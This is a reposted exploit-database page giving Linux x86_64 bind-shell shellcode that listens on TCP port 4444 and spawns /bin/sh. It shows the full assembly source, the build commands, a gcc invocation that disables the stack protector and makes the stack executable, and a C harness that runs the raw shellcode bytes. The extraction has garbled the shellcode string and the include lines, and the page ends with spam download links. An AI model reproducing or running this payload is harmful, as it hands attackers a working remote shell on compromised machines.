Bind (4444/TCP) Shell (/bin/sh) Shellcode (131 bytes) – DigitalMunition




Exploit spider-orange.png

Published on June 10th, 2019 📆 | 7481 Views ⚑

0

Bind (4444/TCP) Shell (/bin/sh) Shellcode (131 bytes)

;Title: Linux/x86_64 - Bind (4444/TCP) Shell (/bin/sh)
;Author: Aron Mihaljevic
;Architecture: Linux x86_64
;Shellcode Length:  131 bytes
;github = https://github.com/STARRBOY	
;test shellcode = after you run the shellcode, open another terminal and run "netcat -vv 0.0.0.0 4444"


================== ASSEMBLY ========================================


global _start


section .text

_start:
		
	
	xor rsi,	rsi	;set rsi to zero, since we will push syscall and first param on the stack and then pop it of we don't need to
				;set rax and rdi to zero

create_socket:
	
	;int socket(int domain, int type, int protocol);
	push 41			;sys_socket
	pop rax
	push 2
	pop rdi	
	inc rsi			;SOCK_STREAM
	xor rdx,	rdx
	syscall

	;save the return value for future use
	xchg rdi, rax

	
	; sin_zero:        0
	; sin_addr.s_addr: INADDR_ANY = 0
	; sin_port:        4444 
	; sin_family:      AF_INET = 2
	xor rax, rax
	push rax			; sin_zero 
	push rax			; zero out another 8 bytes for remaining members
	mov word [rsp+2], 0x5c11	; sin_port = 4444
	mov byte [rsp], 0x2		; sin_family

bind:
	;int bind(int sockfd, const struct sockaddr *addr, socklen_t addrlen);
	xor 	rdx,	rdx	
	push 	49
	pop 	rax
	push	rsp	
	pop 	rsi		;sockaddr stack pointer
	add	rdx,	16	;sizeof sockaddr
	syscall


listen:
	;int listen(int sockfd, int backlog);
	xor     rsi,	rsi
	push 	50		;sys_listen
	pop 	rax
	inc 	rsi		;backlog = number of clients 
	syscall

	
accept:
	;int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen);
	push 	43 		;sys_accept
	pop 	rax
	mov rsi, rsp		; stack pointer for client sockaddr
	mov byte [rsp-1], 0x10	; put size of the structure on the stack
	dec rsp			; adjust stack pointer for previous
	mov rdx, rsp		; stack pointer for struct size
	syscall

	;save client socket 
	xchg r10,	 rax

	
close:
	;int close(int fd);
	push	3		;sys_close
	pop 	rax
	push	rax		;save 3 on the stack for rsi in dup2
	syscall


	xchg    rdi,	r10	;client socket as first parameter for dup2
	pop 	rsi
	
dup2loop:
	
	;int dup2(int oldfd, int newfd);
	push	33		;sys_dup2
	pop	rax
	dec 	rsi		
	syscall
	loopnz  dup2loop	
	


spawn_shell:
	
	;int execve(const char *filename, char *const argv[], char *const envp[]);
	xor eax,	eax
	add al,		59			;sys_execve
	xor rdi,	rdi			;set rdi to zero
	push rdi				;push null on the stack
	mov rdi,	0x68732F2f6e69622F	;bin//sh in reverse
	push rdi				
	mov rdi,	rsp			;set stack pointer to rdi
	xor rsi,	rsi			;rsi and rdx == 0
	xor rdx,	rdx
	syscall



=======Generate Shellcode==========================================
nasm -felf64 tcp_bind.nasm -o tcp_bind.o 
ld tcp_bind.o -o tcp_bind


=========generate C program to exploit=============================
gcc -fno-stack-protector -z execstack bind.c -o bind


======================C program=====================================

#include 
#include 

unsigned char shellcode[]=
        "x48x31xf6x6ax29x58x6ax02x5fx48xffxc6x48"
        "x31xd2x0fx05x48x97x48x31xc0x50x50x66xc7"
        "x44x24x02x11x5cxc6x04x24x02x48x31xd2x6a"
        "x31x58x54x5ex48x83xc2x10x0fx05x48x31xf6"
        "x6ax32x58x48xffxc6x0fx05x6ax2bx58x48x89"
        "xe6xc6x44x24xffx10x48xffxccx48x89xe2x0f"
        "x05x49x92x6ax03x58x50x0fx05x49x87xfax5e"
        "x6ax21x58x48xffxcex0fx05xe0xf6x31xc0x04"
        "x3bx48x31xffx57x48xbfx2fx62x69x6ex2fx2f"
        "x73x68x57x48x89xe7x48x31xf6x48x31xd2x0fx05";

int main(){

        printf("length of your shellcode is: %dn", (int)strlen(shellcode));

        int (*ret)() = (int(*)())shellcode;

        ret();
}
            

https://www.exploit-db.com/exploits/46975

Download Best WordPress Themes Free Download
Download WordPress Themes
Download Best WordPress Themes Free Download
Download WordPress Themes
udemy paid course free download

Tagged with:



Leave a Reply ✍


loading...